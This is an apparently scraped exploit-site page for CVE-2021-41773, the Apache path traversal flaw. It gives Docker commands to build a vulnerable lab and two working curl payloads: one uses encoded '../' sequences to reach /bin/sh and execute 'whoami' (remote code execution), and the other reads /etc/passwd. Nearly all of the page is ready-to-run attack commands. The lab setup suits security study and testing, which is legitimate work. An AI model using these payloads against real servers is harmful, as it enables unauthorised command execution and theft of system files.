Share
## https://sploitus.com/exploit?id=18AE455A-1AA7-5386-81C2-39DA02CEFB57
# CVE-2021-41773
POC & Lab For CVE-2021-41773
Setup Lab
```
$ git clone https://github.com/0xc4t/CVE-2021-41773
$ cd CVE-2021-41773
$ docker build -t cve-2021-41773 .
$ docker run --name cve-2021-41773 -p 81:80 cve-2021-41773
```
PoC
```
# RCE
curl 'http://localhost:81/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; whoami'
#LFI
curl http://192.168.56.108:81/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
```
Refrence
- https://vulners.com/cve/CVE-2021-41773
- https://www.hackthebox.com/blog/cve-2021-41773-explained